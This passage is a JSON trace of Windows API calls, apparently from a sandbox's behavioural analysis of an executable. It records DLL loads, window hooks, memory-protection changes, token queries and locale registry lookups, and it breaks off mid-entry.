"arguments": [ { "name": "ProcessInformationClass", "value": "12" }, { "name": "ProcessInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 18 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x0040b2b7", "parentcaller": "0x00000000", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "12" }, { "name": "ProcessInformation", "value": "\\x00\\x80\\x00\\x00" } ], "repeated": 0, "id": 19 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x0040b2b7", "parentcaller": "0x00000000", "category": "misc", "api": "FindResourceExA", "status": false, "return": "0x00000000", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "Type", "value": "#6" }, { "name": "Name", "value": "#3585" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 20 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x0040b2b7", "parentcaller": "0x00000000", "category": "misc", "api": "FindResourceExA", "status": true, "return": "0x020c0bb0", "arguments": [ { "name": "Module", "value": "0x73210000" }, { "name": "Type", "value": "#6" }, { "name": "Name", "value": "#3585" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 21 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x0040b2b7", "parentcaller": "0x00000000", "category": "system", "api": "SetWindowsHookExA", "status": true, "return": "0x00270283", "arguments": [ { "name": "HookIdentifier", "value": "18446744073709551615" }, { "name": "ProcedureAddress", "value": "0x73289fa0" }, { "name": "ModuleAddress", "value": "0x00000000" }, { "name": "ThreadId", "value": "4148" } ], "repeated": 0, "id": 22 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x0040a1fd", "parentcaller": "0x0040b2b7", "category": "misc", "api": "FindResourceExA", "status": false, "return": "0x00000000", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "Type", "value": "#14" }, { "name": "Name", "value": "#128" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 23 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x0040a1fd", "parentcaller": "0x0040b2b7", "category": "misc", "api": "FindResourceExA", "status": false, "return": "0x00000000", "arguments": [ { "name": "Module", "value": "0x73210000" }, { "name": "Type", "value": "#14" }, { "name": "Name", "value": "#128" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 24 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "misc", "api": "FindResourceExA", "status": true, "return": "0x004410d8", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "Type", "value": "#5" }, { "name": "Name", "value": "#102" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 1, "id": 25 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "SetWindowsHookExA", "status": true, "return": "0x005d0359", "arguments": [ { "name": "HookIdentifier", "value": "5", "pretty_value": "WH_CBT" }, { "name": "ProcedureAddress", "value": "0x73240e80" }, { "name": "ModuleAddress", "value": "0x00000000" }, { "name": "ThreadId", "value": "4148" } ], "repeated": 0, "id": 26 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.4355_none_c0dc01d438beab35\\COMCTL32" }, { "name": "DllBase", "value": "0x73910000" } ], "repeated": 0, "id": 27 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "imm32.dll" }, { "name": "BaseAddress", "value": "0x75730000" } ], "repeated": 0, "id": 28 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "COMCTL32.DLL" }, { "name": "BaseAddress", "value": "0x73910000" } ], "repeated": 0, "id": 29 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.DLL" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "InitCommonControlsEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392e3e0" } ], "repeated": 0, "id": 30 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73316000" }, { "name": "ModuleName", "value": "MFC42.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 31 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73316000" }, { "name": "ModuleName", "value": "MFC42.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 32 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "COMCTL32.DLL" }, { "name": "BaseAddress", "value": "0x73910000" } ], "repeated": 0, "id": 33 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.DLL" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "InitCommonControlsEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392e3e0" } ], "repeated": 0, "id": 34 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "COMCTL32.DLL" }, { "name": "BaseAddress", "value": "0x73910000" } ], "repeated": 0, "id": 35 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.DLL" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "InitCommonControlsEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392e3e0" } ], "repeated": 0, "id": 36 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "COMCTL32.DLL" }, { "name": "BaseAddress", "value": "0x73910000" } ], "repeated": 0, "id": 37 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.DLL" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "InitCommonControlsEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392e3e0" } ], "repeated": 0, "id": 38 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "COMCTL32.DLL" }, { "name": "BaseAddress", "value": "0x73910000" } ], "repeated": 0, "id": 39 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.DLL" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "InitCommonControlsEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392e3e0" } ], "repeated": 0, "id": 40 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x020e3000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 41 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\uxtheme" }, { "name": "DllBase", "value": "0x74e80000" } ], "repeated": 0, "id": 42 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\uxtheme.dll" }, { "name": "BaseAddress", "value": "0x74e80000" } ], "repeated": 0, "id": 43 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 44 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 45 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 46 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 47 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 48 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 49 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "10" }, { "name": "TokenInformation", "value": "Sg\\x99\\x02\\x00\\x00\\x00\\x00U\\xef\n\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\xbbz\\x99\\x02\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 50 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "8\\x8bH\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 51 }, { "timestamp": "2025-03-02 21:32:27,909", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "__notification__", "api": "sysenter", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadIdentifier", "value": "4148" }, { "name": "Module", "value": "KERNELBASE.dll" }, { "name": "Return Address", "value": "0x76518e0c" } ], "repeated": 0, "id": 52 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000023c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" } ], "repeated": 0, "id": 53 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000023c" }, { "name": "ValueName", "value": "es-ES" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES" } ], "repeated": 0, "id": 54 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 55 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000023c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" } ], "repeated": 0, "id": 56 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000023c" }, { "name": "ValueName", "value": "es-ES" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES" } ], "repeated": 0, "id": 57 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 58 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 59 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00491000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 60 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00496000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 61 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 62 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 63 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "synchronization", "api": "NtFindAtom", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "AfxOldWndProc423" }, { "name": "Atom", "value": "0x0000c0b4" } ], "repeated": 4, "id": 64 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000240" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "MSCTF.dll" } ], "repeated": 0, "id": 65 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000240" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75650000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x000d4000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 66 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75718000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 67 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 68 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 69 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75714000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 70 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000240" } ], "repeated": 0, "id": 71 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75714000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 72 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00o\\x00r\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00n\\x003\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00i\\x00n\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00-\\x00l\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00" } ], "repeated": 0, "id": 73 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", 